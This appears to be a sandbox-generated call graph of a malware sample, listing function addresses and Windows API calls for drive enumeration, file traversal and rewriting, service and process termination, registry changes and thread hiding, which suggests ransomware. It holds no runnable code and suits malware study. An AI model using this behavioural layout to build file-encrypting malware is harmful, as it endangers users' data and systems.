9397->9858 9405 d17643 9402->9405 9406 d1763a 9402->9406 9407 d17616 9403->9407 9865 d16d04 9403->9865 9897 d0a308 9405->9897 9408 d16b18 2 API calls 9406->9408 9407->9382 9879 d10410 9407->9879 9408->9382 9413 d17678 9413->9382 9901 d12384 9413->9901 9415 d0a308 2 API calls 9416 d17667 9415->9416 9416->9413 9417 d1766c 9416->9417 9418 d09b80 3 API calls 9417->9418 9419 d17671 9418->9419 9420 d16f90 114 API calls 9419->9420 9420->9382 9422 d05b28 9421->9422 9423 d05b0e 9421->9423 9425 d05afc 3 API calls 9422->9425 9427 d05b50 9422->9427 9424 d05afc 3 API calls 9423->9424 9424->9422 9425->9427 9426 d05c1a 9426->9293 9426->9336 9427->9426 9440 d05a94 9427->9440 9455 d05c34 9429->9455 9431 d05ddb 9431->9299 9432 d05afc 3 API calls 9433 d05deb RtlAllocateHeap 9432->9433 9434 d05dc5 9433->9434 9434->9431 9434->9432 9470 d06830 9435->9470 9437 d17745 9437->9336 9439 d176b5 9439->9437 9473 d0684c 9439->9473 9441 d05ac0 9440->9441 9442 d05af2 9440->9442 9441->9442 9447 d05a30 9441->9447 9442->9427 9444 d05ad4 9444->9442 9445 d05ae8 9444->9445 9450 d059e4 9445->9450 9448 d05a47 9447->9448 9449 d05a75 LdrLoadDll 9448->9449 9449->9444 9451 d05a14 LdrGetProcedureAddress 9450->9451 9452 d059f3 9450->9452 9453 d05a26 9451->9453 9454 d059ff LdrGetProcedureAddress 9452->9454 9453->9442 9454->9453 9456 d05c61 9455->9456 9457 d05c47 9455->9457 9459 d05c89 9456->9459 9460 d05afc 3 API calls 9456->9460 9458 d05afc 3 API calls 9457->9458 9458->9456 9461 d05afc 3 API calls 9459->9461 9462 d05cb1 9459->9462 9460->9459 9461->9462 9463 d05cf9 FindFirstFileW 9462->9463 9464 d05d6a 9462->9464 9465 d05d47 FindNextFileW 9462->9465 9466 d05d29 FindClose 9462->9466 9463->9462 9464->9434 9465->9462 9467 d05d5b FindClose 9465->9467 9468 d05a30 LdrLoadDll 9466->9468 9467->9462 9469 d05d40 9468->9469 9469->9434 9476 d010ac 9470->9476 9472 d06838 RtlAllocateHeap 9472->9439 9477 d010ac 9473->9477 9475 d06854 RtlFreeHeap 9475->9437 9476->9472 9477->9475 9611 d06db0 9478->9611 9480 d06f28 9481 d071ff 9480->9481 9482 d06830 RtlAllocateHeap 9480->9482 9481->9343 9487 d06f45 9482->9487 9483 d071f7 9484 d0684c RtlFreeHeap 9483->9484 9484->9481 9485 d071e9 9486 d0684c RtlFreeHeap 9485->9486 9486->9483 9487->9483 9487->9485 9488 d06fc8 9487->9488 9489 d06830 RtlAllocateHeap 9487->9489 9490 d06830 RtlAllocateHeap 9488->9490 9491 d06ffb 9488->9491 9489->9488 9490->9491 9492 d0702e 9491->9492 9493 d06830 RtlAllocateHeap 9491->9493 9494 d06830 RtlAllocateHeap 9492->9494 9496 d07061 9492->9496 9493->9492 9494->9496 9495 d070fa 9502 d06830 RtlAllocateHeap 9495->9502 9503 d07131 9495->9503 9497 d07094 9496->9497 9498 d06830 RtlAllocateHeap 9496->9498 9499 d06830 RtlAllocateHeap 9497->9499 9500 d070c7 9497->9500 9498->9497 9499->9500 9500->9495 9501 d06830 RtlAllocateHeap 9500->9501 9501->9495 9502->9503 9503->9485 9504 d06830 RtlAllocateHeap 9503->9504 9505 d0716c 9504->9505 9505->9485 9614 d06eac 9505->9614 9507 d07194 9508 d06830 RtlAllocateHeap 9507->9508 9509 d071b3 9508->9509 9509->9485 9510 d0684c RtlFreeHeap 9509->9510 9510->9485 9512 d06830 RtlAllocateHeap 9511->9512 9513 d06d1d 9512->9513 9513->9342 9515 d06830 RtlAllocateHeap 9514->9515 9516 d0badd 9515->9516 9516->9347 9518 d0b671 9517->9518 9519 d099da 9518->9519 9520 d0b678 RtlAdjustPrivilege 9518->9520 9521 d0b5d0 9519->9521 9520->9518 9522 d0b5e7 9521->9522 9523 d0b5eb NtQueryInformationToken 9522->9523 9524 d099df 9522->9524 9523->9524 9524->9355 9525 d0b358 9524->9525 9623 d097a8 9525->9623 9527 d0b375 9528 d0b383 9527->9528 9633 d09850 9527->9633 9528->9358 9531 d0b19a 9530->9531 9532 d06830 RtlAllocateHeap 9531->9532 9534 d0b1a5 9532->9534 9533 d09a28 9533->9375 9601 d0b514 9533->9601 9534->9533 9535 d0684c RtlFreeHeap 9534->9535 9538 d0b1c6 9535->9538 9536 d0b320 9537 d0684c RtlFreeHeap 9536->9537 9537->9533 9538->9536 9641 d06de0 9538->9641 9540 d0b2d6 9541 d06de0 RtlAllocateHeap 9540->9541 9542 d0b2fb 9541->9542 9543 d06de0 RtlAllocateHeap 9542->9543 9543->9536 9545 d0c374 9544->9545 9546 d09ac3 9544->9546 9547 d06db0 RtlAllocateHeap 9545->9547 9566 d0e214 9546->9566 9548 d0c385 9547->9548 9548->9546 9549 d06830 RtlAllocateHeap 9548->9549 9553 d0c3a1 9549->9553 9550 d0c5a1 9551 d0684c RtlFreeHeap 9550->9551 9551->9546 9552 d0684c RtlFreeHeap 9552->9550 9553->9550 9554 d0c3f5 CreateFileW 9553->9554 9556 d0c592 9553->9556 9555 d0c449 WriteFile 9554->9555 9554->9556 9555->9556 9557 d0c464 RegCreateKeyExW 9555->9557 9556->9552 9557->9556 9558 d0c48d RegSetValueExW 9557->9558 9560 d0c589 NtClose 9558->9560 9561 d0c4bf RegCreateKeyExW 9558->9561 9560->9556 9561->9560 9563 d0c53a RegSetValueExW 9561->9563 9563->9560 9565 d0c56e SHChangeNotify 9563->9565 9565->9560 9567 d0e230 9566->9567 9644 d0e2ac 9567->9644 9569 d0e286 9570 d09ac8 9569->9570 9571 d0684c RtlFreeHeap 9569->9571 9570->9286 9571->9570 9574 d0b46d 9572->9574 9573 d0999e 9573->9340 9578 d0ba18 9573->9578 9574->9573 9575 d06830 RtlAllocateHeap 9574->9575 9576 d0b4a6 9575->9576 9576->9573 9577 d0684c RtlFreeHeap 9576->9577 9577->9573 9579 d0ba2d 9578->9579 9580 d0bac2 9579->9580 9648 d09710 9579->9648 9580->9340 9583 d0684c RtlFreeHeap 9583->9580 9585 d0ae8f 9584->9585 9600 d0b044 9585->9600 9652 d0abf8 9585->9652 9587 d0ae9d 9588 d0af8b 9587->9588 9589 d0b09f 9587->9589 9587->9600 9590 d06db0 RtlAllocateHeap 9588->9590 9588->9600 9591 d06db0 RtlAllocateHeap 9589->9591 9589->9600 9592 d0afbe 9590->9592 9593 d0b0ce 9591->9593 9595 d0684c RtlFreeHeap 9592->9595 9592->9600 9594 d0684c RtlFreeHeap 9593->9594 9593->9600 9594->9600 9596 d0afe0 9595->9596 9597 d06db0 RtlAllocateHeap 9596->9597 9596->9600 9598 d0b026 9597->9598 9599 d0684c RtlFreeHeap 9598->9599 9598->9600 9599->9600 9600->9355 9603 d0b529 9601->9603 9602 d0b5b3 9602->9368 9603->9602 9604 d06830 RtlAllocateHeap 9603->9604 9606 d0b562 9604->9606 9605 d0684c RtlFreeHeap 9605->9602 9606->9602 9606->9605 9608 d13154 9607->9608 9610 d131b2 9608->9610 9661 d12eb4 9608->9661 9610->9357 9612 d06830 RtlAllocateHeap 9611->9612 9613 d06dc1 9612->9613 9613->9480 9615 d06ed3 9614->9615 9620 d06e54 9615->9620 9617 d06ef3 9618 d0684c RtlFreeHeap 9617->9618 9619 d06f07 9618->9619 9619->9507 9621 d06830 RtlAllocateHeap 9620->9621 9622 d06e77 9621->9622 9622->9617 9624 d06830 RtlAllocateHeap 9623->9624 9627 d097c6 9624->9627 9625 d097c9 NtQuerySystemInformation 9626 d097df 9625->9626 9625->9627 9626->9527 9631 d0684c RtlFreeHeap 9626->9631 9627->9625 9628 d097fc 9627->9628 9637 d06868 9627->9637 9629 d0684c RtlFreeHeap 9628->9629 9629->9626 9632 d09842 9631->9632 9632->9527 9636 d09875 9633->9636 9634 d0993e NtClose 9635 d09947 9634->9635 9635->9528 9636->9634 9636->9635 9640 d010ac 9637->9640 9639 d06870 RtlReAllocateHeap 9639->9627 9640->9639 9642 d06830 RtlAllocateHeap 9641->9642 9643 d06df2 9642->9643 9643->9540 9645 d0e2b8 9644->9645 9647 d0e2c5 9644->9647 9646 d06830 RtlAllocateHeap 9645->9646 9645->9647 9646->9647 9647->9569 9649 d09722 9648->9649 9651 d0974a 9648->9651 9650 d06830 RtlAllocateHeap 9649->9650 9650->9651 9651->9583 9653 d06830 RtlAllocateHeap 9652->9653 9654 d0ac1d 9653->9654 9655 d0ac53 9654->9655 9656 d06868 RtlReAllocateHeap 9654->9656 9660 d0ac36 9654->9660 9657 d0684c RtlFreeHeap 9655->9657 9656->9654 9657->9660 9658 d0684c RtlFreeHeap 9659 d0ad80 9658->9659 9659->9587 9660->9587 9660->9658 9662 d12ec5 9661->9662 9664 d13053 9662->9664 9665 d0b390 9662->9665 9664->9610 9666 d0b3a2 9665->9666 9667 d0b39f 9665->9667 9666->9667 9668 d0b3e9 NtSetInformationThread 9666->9668 9667->9664 9669 d0b3fe 9668->9669 9670 d0b3ff NtClose 9668->9670 9669->9670 9670->9667 9672 d09b93 9671->9672 9673 d09c2e 9671->9673 9938 d07f8c 9672->9938 9680 d16f90 9673->9680 9676 d09be1 9678 d09c01 CreateMutexW 9676->9678 9677 d10410 2 API calls 9677->9676 9942 d068b4 9678->9942 9693 d16fad 9680->9693 9681 d1705b 9682 d170a1 CreateThread CreateThread 9681->9682 9683 d17076 CreateThread 9681->9683 9686 d170da 9682->9686 9687 d170df 9682->9687 10453 d07438 GetLogicalDriveStringsW 9682->10453 10458 d077fc CoInitialize 9682->10458 9683->9682 9685 d17091 9683->9685 10438 d08f38 RtlAdjustPrivilege 9683->10438 9684 d17018 9684->9681 9692 d09c34 3 API calls 9684->9692 9685->9682 9948 d07c74 OpenSCManagerW 9686->9948 9689 d17100 9687->9689 9690 d170e8 CreateThread 9687->9690 9698 d1717d 9689->9698 9956 d0b690 9689->9956 9690->9689 10425 d07e28 9690->10425 9692->9681 9693->9681 9693->9684 10032 d09c34 9693->10032 9696 d171c7 NtTerminateThread 9697 d171db 9696->9697 9700 d171e4 CreateThread 9697->9700 9701 d171ff 9697->9701 9698->9696 9698->9697 9700->9701 10433 d095f8 9700->10433 9703 d1721f 9701->9703 9704 d172ee 9701->9704 9706 d17228 CreateThread 9703->9706 9728 d17243 9703->9728 10096 d11890 9704->10096 9705 d1715d 9709 d0e214 2 API calls 9705->9709 9711 d17170 9705->9711 9706->9728 10396 d0bfc0 9706->10396 9714 d1716b 9709->9714 9721 d0e214 2 API calls 9711->9721 9712 d17295 9715 d0b5d0 NtQueryInformationToken 9712->9715 10010 d0fbe4 9714->10010 9719 d1729a 9715->9719 9717 d0e214 2 API calls 9722 d1714e 9717->9722 9723 d172a5 9719->9723 9724 d1729e 9719->9724 9721->9698 9980 d10994 9722->9980 10072 d08200 9723->10072 10068 d08930 9724->10068 9728->9712 10053 d0d95c 9728->10053 9730 d172ec 9730->9382 9732 d0e214 2 API calls 9733 d17158 9732->9733 9984 d10b40 9733->9984 9735 d172a3 9735->9730 10090 d09610 9735->10090 9739 d10410 2 API calls 9739->9730 9741 d068fc RtlAllocateHeap 9740->9741 9743 d11fd0 9741->9743 9742 d12069 9742->9382 9743->9742 9744 d12001 9743->9744 9745 d11ff2 9743->9745 10619 d073f8 9744->10619 10593 d0ff5c 9745->10593 9749 d12061 9750 d0684c RtlFreeHeap 9749->9750 9750->9742 9751 d06830 RtlAllocateHeap 9787 d12046 9751->9787 9752 d1207e 9753 d0684c RtlFreeHeap 9752->9753 9753->9742 9754 d0a250 NtSetInformationThread NtClose 9754->9787 9755 d0a308 2 API calls 9755->9787 9756 d120f2 9758 d0684c RtlFreeHeap 9756->9758 9757 d122cb 9759 d0684c RtlFreeHeap 9757->9759 9758->9742 9759->9742 9760 d121ea 9762 d0684c RtlFreeHeap 9760->9762 9761 d121fd 10631 d0a3ac 9761->10631 9762->9742 9763 d121cd 9768 d0684c RtlFreeHeap 9763->9768 9764 d122fd 9766 d0694c RtlAllocateHeap 9764->9766 9765 d122de 9765->9764 9770 d122f3 9765->9770 9771 d12356 9766->9771 9768->9742 9769 d12221 9774 d12289 9769->9774 9775 d1227f 9769->9775 9776 d0684c RtlFreeHeap 9770->9776 9777 d0684c RtlFreeHeap 9771->9777 10635 d06a3c 9774->10635 9779 d0694c RtlAllocateHeap 9775->9779 9776->9742 9781 d1235f 9777->9781 9778 d12214 9782 d0684c RtlFreeHeap 9778->9782 9783 d12287 9779->9783 9781->9742 9788 d108c8 10 API calls 9781->9788 9782->9742 9785 d0684c RtlFreeHeap 9783->9785 9784 d0ab38 NtSetInformationThread NtClose 9784->9787 9786 d1229a 9785->9786 9786->9742 10639 d108c8 9786->10639 9787->9742 9787->9749 9787->9751 9787->9752 9787->9754 9787->9755 9787->9756 9787->9757 9787->9760 9787->9761 9787->9763 9787->9764 9787->9765 9787->9769 9787->9784 9789 d0684c RtlFreeHeap 9787->9789 10625 d0a928 9787->10625 9788->9742 9789->9787 9792 d11c84 2 API calls 9791->9792 9793 d11e5e 9792->9793 9794 d11e83 9793->9794 9795 d11e62 9793->9795 9796 d09610 2 API calls 9794->9796 9797 d11e7e 9795->9797 9798 d10410 2 API calls 9795->9798 9799 d11e88 9796->9799 9797->9382 9798->9797 9800 d11e8c 9799->9800 9805 d11e96 9799->9805 9801 d16f90 114 API calls 9800->9801 9802 d11e91 9801->9802 9802->9382 9803 d11fb2 9803->9382 9804 d11f11 9806 d11f5a 9804->9806 9810 d09c34 3 API calls 9804->9810 9805->9803 9805->9804 9807 d09c34 3 API calls 9805->9807 10648 d10d8c 9806->10648 9807->9804 9810->9806 9814 d11f87 9814->9803 10696 d110cc 9814->10696 9817 d08200 2 API calls 9818 d11fab 9817->9818 9819 d11608 2 API calls 9818->9819 9819->9803 10735 d11b44 9820->10735 9822 d17314 9823 d08200 2 API calls 9822->9823 9824 d1731b 9823->9824 9825 d0b5d0 NtQueryInformationToken 9824->9825 9826 d17334 9825->9826 9827 d173ac 9826->9827 9828 d09610 2 API calls 9826->9828 9827->9382 9829 d1738c 9828->9829 9830 d10410 2 API calls 9829->9830 9830->9827 9832 d138b0 RtlAllocateHeap 9831->9832 9836 d16f0e 9832->9836 9833 d16f7d 9834 d16f8b 9833->9834 9835 d0684c RtlFreeHeap 9833->9835 9846 d16b18 9834->9846 9835->9834 9836->9833 9837 d16f52 9836->9837 10748 d163ec 9836->10748 10766 d13dfc 9837->10766 9843 d16f73 9845 d13dfc 2 API calls 9843->9845 9845->9833 9847 d16cfb 9846->9847 9848 d16b2c 9846->9848 9847->9382 9849 d138b0 RtlAllocateHeap 9848->9849 9854 d16b3c 9849->9854 9850 d16ced 9850->9847 9852 d0684c RtlFreeHeap 9850->9852 9851 d0684c RtlFreeHeap 9851->9850 9852->9847 9853 d16be2 9853->9850 9853->9851 9854->9853 9855 d06830 RtlAllocateHeap 9854->9855 9856 d16c04 9855->9856 9856->9853 11074 d165e4 9856->11074 9859 d138b0 RtlAllocateHeap 9858->9859 9863 d1387a 9859->9863 9860 d1389e 9861 d138ac 9860->9861 9862 d0684c RtlFreeHeap 9860->9862 9861->9382 9862->9861 9863->9860 11084 d136e0 9863->11084 9866 d16d20 9865->9866 9867 d06db0 RtlAllocateHeap 9866->9867 9868 d16e31 9867->9868 9869 d06db0 RtlAllocateHeap 9868->9869 9878 d16e3a 9868->9878 9871 d16e4b 9869->9871 9870 d16ed7 9873 d16ee5 9870->9873 9875 d0684c RtlFreeHeap 9870->9875 9874 d06db0 RtlAllocateHeap 9871->9874 9871->9878 9872 d0684c RtlFreeHeap 9872->9870 9876 d16ef3 9873->9876 9877 d0684c RtlFreeHeap 9873->9877 9874->9878 9875->9873 9876->9407 9877->9876 9878->9870 9878->9872 9880 d10445 9879->9880 9881 d06db0 RtlAllocateHeap 9880->9881 9882 d104be 9881->9882 9883 d06830 RtlAllocateHeap 9882->9883 9896 d104c7 9882->9896 9885 d104de 9883->9885 9884 d1088c 9887 d1089a 9884->9887 9889 d0684c RtlFreeHeap 9884->9889 9885->9896 11102 d10294 9885->11102 9886 d0684c RtlFreeHeap 9886->9884 9890 d108a8 9887->9890 9891 d0684c RtlFreeHeap 9887->9891 9889->9887 9892 d108b6 9890->9892 9893 d0684c RtlFreeHeap 9890->9893 9891->9890 9892->9382 9893->9892 9894 d1050f 9895 d06db0 RtlAllocateHeap 9894->9895 9894->9896 9895->9896 9896->9884 9896->9886 9898 d0a32b 9897->9898 9899 d0b390 2 API calls 9898->9899 9900 d0a345 9898->9900 9899->9900 9900->9413 9900->9415 9902 d068fc RtlAllocateHeap 9901->9902 9906 d1239c 9902->9906 9903 d0a250 NtSetInformationThread NtClose 9903->9906 9904 d0a308 2 API calls 9904->9906 9905 d12518 9907 d0684c RtlFreeHeap 9905->9907 9906->9903 9906->9904 9906->9905 9908 d12437 9906->9908 9910 d1244a 9906->9910 9911 d1241a 9906->9911 9912 d1254a 9906->9912 9914 d1246e 9906->9914 9915 d1252b 9906->9915 9931 d0ab38 NtSetInformationThread NtClose 9906->9931 9932 d12422 9906->9932 9935 d0684c RtlFreeHeap 9906->9935 9907->9932 9909 d0684c RtlFreeHeap 9908->9909 9909->9932 9917 d0a3ac 2 API calls 9910->9917 9913 d0684c RtlFreeHeap 9911->9913 9916 d0694c RtlAllocateHeap 9912->9916 9913->9932 9919 d124d6 9914->9919 9920 d124cc 9914->9920 9915->9912 9921 d12540 9915->9921 9922 d125a3 9916->9922 9918 d1245d 9917->9918 9918->9914 9923 d12461 9918->9923 9925 d06a3c RtlAllocateHeap 9919->9925 9924 d0694c RtlAllocateHeap 9920->9924 9926 d0684c RtlFreeHeap 9921->9926 9927 d0684c RtlFreeHeap 9922->9927 9929 d0684c RtlFreeHeap 9923->9929 9930 d124d4 9924->9930 9925->9930 9926->9932 9928 d125ac 9927->9928 9928->9932 9934 d108c8 10 API calls 9928->9934 9929->9932 9933 d0684c RtlFreeHeap 9930->9933 9931->9906 9932->9382 9936 d124e7 9933->9936 9934->9932 9935->9906 9936->9932 9937 d108c8 10 API calls 9936->9937 9937->9932 9939 d07fa5 9938->9939 9941 d0805e 9939->9941 9945 d06888 9939->9945 9941->9676 9941->9677 9943 d0684c RtlFreeHeap 9942->9943 9944 d068c3 9943->9944 9944->9673 9946 d06830 RtlAllocateHeap 9945->9946 9947 d0689e 9946->9947 9947->9941 9949 d07ca2 9948->9949 9950 d07daa 9948->9950 9952 d06830 RtlAllocateHeap 9949->9952 9951 d07dc7 9950->9951 9953 d0684c RtlFreeHeap 9950->9953 9951->9687 9954 d07cd1 9952->9954 9953->9951 9954->9950 10125 d0dbbc 9954->10125 9957 d06888 RtlAllocateHeap 9956->9957 9958 d0b698 9957->9958 9959 d0b6e0 9958->9959 9960 d0b69e NtSetInformationProcess NtSetInformationProcess NtSetInformationProcess 9958->9960 9962 d0e144 9959->9962 9961 d068b4 RtlFreeHeap 9960->9961 9961->9959 9965 d0e151 9962->9965 9963 d0e1b6 9963->9698 9963->9705 9967 d0a65c 9963->9967 9964 d0e186 CreateThread 9964->9965 10129 d0ddd4 SetThreadPriority 9964->10129 9965->9963 9965->9964 9966 d0e1a7 NtClose 9965->9966 9966->9965 9968 d0a683 GetVolumeNameForVolumeMountPointW 9967->9968 9970 d0a6c6 FindFirstVolumeW 9968->9970 9973 d0a917 9970->9973 9978 d0a6e2 9970->9978 9971 d0a6fb GetVolumePathNamesForVolumeNameW 9971->9978 9972 d0a72c GetDriveTypeW 9972->9978 9973->9717 9974 d0a7cd CreateFileW 9975 d0a7f3 DeviceIoControl 9974->9975 9976 d0a8e6 NtClose 9974->9976 9975->9976 9975->9978 9976->9978 9977 d0a5d0 6 API calls 9977->9978 9978->9971 9978->9972 9978->9973 9978->9974 9978->9976 9978->9977 10137 d0a5d0 9978->10137 9981 d109ee 9980->9981 9983 d10a68 9981->9983 10149 d0694c 9981->10149 9983->9732 9985 d10b55 9984->9985 9986 d0a458 6 API calls 9985->9986 9987 d10b67 9986->9987 9988 d10b6d 9987->9988 9989 d06830 RtlAllocateHeap 9987->9989 9990 d10d66 9988->9990 9992 d0684c RtlFreeHeap 9988->9992 9991 d10b7f 9989->9991 9993 d10d74 9990->9993 9995 d0684c RtlFreeHeap 9990->9995 9991->9988 9996 d0a458 6 API calls 9991->9996 9992->9990 9994 d10d82 9993->9994 9998 d0684c RtlFreeHeap 9993->9998 9994->9705 9995->9993 9997 d10b9c 9996->9997 9997->9988 9999 d06830 RtlAllocateHeap 9997->9999 9998->9994 10000 d10bb7 9999->10000 10000->9988 10001 d06830 RtlAllocateHeap 10000->10001 10008 d10bd2 10001->10008 10003 d0694c RtlAllocateHeap 10004 d10c2e CreateThread 10003->10004 10004->10008 10162 d0f264 GetFileAttributesW 10004->10162 10005 d0694c RtlAllocateHeap 10005->10008 10006 d10d4e Sleep 10009 d10cfc 10006->10009 10007 d0b390 2 API calls 10007->10008 10008->9988 10008->10003 10008->10005 10008->10007 10008->10009 10153 d0a190 CreateThread 10008->10153 10009->9988 10009->10006 10011 d0fc10 10010->10011 10012 d06830 RtlAllocateHeap 10011->10012 10013 d0fc1d 10012->10013 10014 d0fc26 10013->10014 10324 d0f788 CoInitialize 10013->10324 10016 d0ff37 10014->10016 10018 d0684c RtlFreeHeap 10014->10018 10019 d0ff45 10016->10019 10020 d0684c RtlFreeHeap 10016->10020 10018->10016 10021 d0ff53 10019->10021 10023 d0684c RtlFreeHeap 10019->10023 10020->10019 10021->9711 10022 d06830 RtlAllocateHeap 10024 d0fc53 10022->10024 10023->10021 10024->10014 10025 d06830 RtlAllocateHeap 10024->10025 10031 d0fc6e 10025->10031 10026 d0f4f8 NtSetInformationThread NtClose 10026->10031 10028 d0f634 NtSetInformationThread NtClose 10028->10031 10029 d0b390 2 API calls 10029->10031 10030 d0684c RtlFreeHeap 10030->10031 10031->10014 10031->10026 10031->10028 10031->10029 10031->10030 10330 d069a8 10031->10330 10034 d09c66 10032->10034 10033 d09c6a 10033->9684 10034->10033 10334 d138b0 10034->10334 10036 d0a01a 10038 d0a02e 10036->10038 10039 d0684c RtlFreeHeap 10036->10039 10037 d0684c RtlFreeHeap 10037->10036 10040 d0a042 10038->10040 10041 d0684c RtlFreeHeap 10038->10041 10039->10038 10042 d0a056 10040->10042 10043 d0684c RtlFreeHeap 10040->10043 10041->10040 10042->9684 10043->10042 10044 d09de1 10045 d0b5d0 NtQueryInformationToken 10044->10045 10049 d09df0 10044->10049 10046 d09eb2 10045->10046 10047 d06db0 RtlAllocateHeap 10046->10047 10046->10049 10048 d09ef5 10047->10048 10048->10049 10050 d06db0 RtlAllocateHeap 10048->10050 10049->10036 10049->10037 10051 d09f15 10050->10051 10051->10049 10052 d06db0 RtlAllocateHeap 10051->10052 10052->10049 10337 d0ce38 10053->10337 10055 d0d99e 10057 d0dac6 10055->10057 10058 d0684c RtlFreeHeap 10055->10058 10056 d0d995 10056->10055 10063 d06db0 RtlAllocateHeap 10056->10063 10059 d0dad4 10057->10059 10060 d0684c RtlFreeHeap 10057->10060 10058->10057 10061 d0dae2 10059->10061 10062 d0684c RtlFreeHeap 10059->10062 10060->10059 10061->9712 10062->10061 10064 d0d9eb 10063->10064 10064->10055 10065 d06830 RtlAllocateHeap 10064->10065 10066 d0da21 10065->10066 10066->10055 10341 d0cf28 10066->10341 10069 d08941 10068->10069 10070 d0b390 2 API calls 10069->10070 10071 d08b3c 10069->10071 10070->10071 10071->9735 10077 d08260 10072->10077 10089 d0825b 10072->10089 10073 d088d9 10075 d0684c RtlFreeHeap 10073->10075 10076 d088e7 10073->10076 10074 d0684c RtlFreeHeap 10074->10073 10075->10076 10076->9735 10078 d06830 RtlAllocateHeap 10077->10078 10077->10089 10079 d0839f 10078->10079 10080 d083d1 10079->10080 10081 d083b7 10079->10081 10079->10089 10083 d06db0 RtlAllocateHeap 10080->10083 10082 d06db0 RtlAllocateHeap 10081->10082 10084 d083c1 10082->10084 10083->10084 10085 d08404 10084->10085 10087 d08418 10084->10087 10084->10089 10086 d0684c RtlFreeHeap 10085->10086 10086->10089 10087->10089 10380 d06c60 10087->10380 10089->10073 10089->10074 10093 d09639 10090->10093 10091 d09705 10091->9739 10092 d0684c RtlFreeHeap 10092->10091 10095 d09668 10093->10095 10384 d0c820 10093->10384 10095->10091 10095->10092 10097 d06db0 RtlAllocateHeap 10096->10097 10098 d118c3 10097->10098 10110 d118cc 10098->10110 10390 d11814 10098->10390 10099 d11a04 10101 d11a12 10099->10101 10103 d0684c RtlFreeHeap 10099->10103 10100 d0684c RtlFreeHeap 10100->10099 10104 d11a20 10101->10104 10105 d0684c RtlFreeHeap 10101->10105 10103->10101 10113 d11c84 10104->10113 10105->10104 10106 d11900 10107 d068fc RtlAllocateHeap 10106->10107 10106->10110 10108 d1191b 10107->10108 10109 d06db0 RtlAllocateHeap 10108->10109 10108->10110 10111 d11981 10109->10111 10110->10099 10110->10100 10112 d0684c RtlFreeHeap 10111->10112 10112->10110 10114 d11d88 10113->10114 10116 d11db6 10114->10116 10393 d11b90 10114->10393 10117 d11e47 10116->10117 10118 d0684c RtlFreeHeap 10116->10118 10119 d11608 10117->10119 10118->10117 10120 d11620 10119->10120 10121 d06db0 RtlAllocateHeap 10120->10121 10122 d1165a 10121->10122 10123 d11663 10122->10123 10124 d0684c RtlFreeHeap 10122->10124 10123->9730 10124->10123 10126 d0dc16 10125->10126 10127 d0dc1a NtTerminateProcess 10126->10127 10128 d0dc2e 10126->10128 10127->10128 10128->9954 10135 d0ddeb 10129->10135 10130 d0de4d ReadFile 10130->10135 10131 d0e006 WriteFile 10131->10135 10132 d0e0ac NtClose 10132->10135 10133 d0de3e 10134 d0684c RtlFreeHeap 10134->10135 10135->10130 10135->10131 10135->10132 10135->10133 10135->10134 10136 d0df8d WriteFile 10135->10136 10136->10135 10140 d0a458 CreateThread 10137->10140 10139 d0a600 10139->9976 10141 d0a4f4 10140->10141 10142 d0a498 10140->10142 10148 d0a440 GetLogicalDriveStringsW 10140->10148 10141->10139 10143 d0a4ca ResumeThread 10142->10143 10144 d0b390 2 API calls 10142->10144 10145 d0a4de GetExitCodeThread 10143->10145 10146 d0a4a9 10144->10146 10145->10141 10146->10143 10147 d0a4ad 10146->10147 10147->10139 10150 d06964 10149->10150 10151 d06830 RtlAllocateHeap 10150->10151 10152 d0697a 10150->10152 10151->10152 10152->9983 10154 d0a1c3 10153->10154 10155 d0a21f 10153->10155 10161 d0a180 GetDriveTypeW 10153->10161 10156 d0a1f5 ResumeThread 10154->10156 10157 d0b390 2 API calls 10154->10157 10155->10008 10159 d0a209 GetExitCodeThread 10156->10159 10158 d0a1d4 10157->10158 10158->10156 10160 d0a1d8 10158->10160 10159->10155 10160->10008 10163 d0f2db SetThreadPriority 10162->10163 10164 d0f27d 10162->10164 10168 d0f2ea 10163->10168 10165 d0f2cd 10164->10165 10244 d0a064 FindFirstFileExW 10164->10244 10166 d0684c RtlFreeHeap 10165->10166 10169 d0f2d5 10166->10169 10171 d06830 RtlAllocateHeap 10168->10171 10187 d0f309 10171->10187 10172 d0f2a7 10173 d0c0f8 11 API calls 10172->10173 10175 d0f2b1 10173->10175 10177 d0eec8 14 API calls 10175->10177 10179 d0f2c7 10177->10179 10178 d0684c RtlFreeHeap 10180 d0f339 FindFirstFileExW 10178->10180 10180->10187 10181 d0684c RtlFreeHeap 10181->10187 10182 d0f4a8 10183 d0684c RtlFreeHeap 10182->10183 10186 d0f4cb 10183->10186 10184 d0f470 FindNextFileW 10185 d0f488 FindClose 10184->10185 10184->10187 10185->10187 10187->10178 10187->10181 10187->10182 10187->10184 10188 d0f124 RtlAllocateHeap 10187->10188 10190 d0c0f8 10187->10190 10209 d0f0c0 10187->10209 10213 d0eec8 10187->10213 10188->10187 10191 d0c114 10190->10191 10206 d0c10f 10190->10206 10247 d068fc 10191->10247 10194 d0c12c GetFileAttributesW 10195 d0c13c 10194->10195 10196 d0c181 10195->10196 10197 d0c19a 10195->10197 10200 d0c1e8 6 API calls 10196->10200 10198 d0c1b1 GetFileAttributesW 10197->10198 10199 d0c1a2 10197->10199 10202 d0c1ca CopyFileW 10198->10202 10203 d0c1be 10198->10203 10251 d0c1e8 CreateFileW 10199->10251 10204 d0c189 10200->10204 10208 d0684c RtlFreeHeap 10202->10208 10207 d0684c RtlFreeHeap 10203->10207 10205 d0684c RtlFreeHeap 10204->10205 10205->10206 10206->10187 10207->10199 10208->10206 10210 d0f0d8 10209->10210 10211 d0f0ee 10210->10211 10212 d06830 RtlAllocateHeap 10210->10212 10211->10187 10212->10211 10214 d0f0b1 10213->10214 10215 d0eee9 10213->10215 10214->10187 10262 d0e308 10215->10262 10218 d0f0a9 10219 d0684c RtlFreeHeap 10218->10219 10219->10214 10221 d0ef01 10221->10218 10222 d0ef15 10221->10222 10223 d0ef28 10221->10223 10295 d0eb5c 10222->10295 10299 d0ec40 10223->10299 10226 d0ef43 MoveFileExW 10233 d0ef23 10226->10233 10237 d0ef55 10226->10237 10227 d0ef90 10229 d0684c RtlFreeHeap 10227->10229 10228 d0684c RtlFreeHeap 10228->10233 10229->10237 10230 d0efad CreateFileW 10231 d0efd1 10230->10231 10232 d0efd6 10230->10232 10231->10218 10234 d0684c RtlFreeHeap 10231->10234 10275 d0ec8c 10232->10275 10233->10218 10233->10226 10233->10227 10233->10228 10235 d0ec40 RtlAllocateHeap 10233->10235 10233->10237 10234->10218 10235->10233 10237->10230 10237->10231 10239 d0efff CreateIoCompletionPort 10240 d0f016 10239->10240 10242 d0f038 10239->10242 10241 d0684c RtlFreeHeap 10240->10241 10241->10231 10242->10231 10243 d0684c RtlFreeHeap 10242->10243 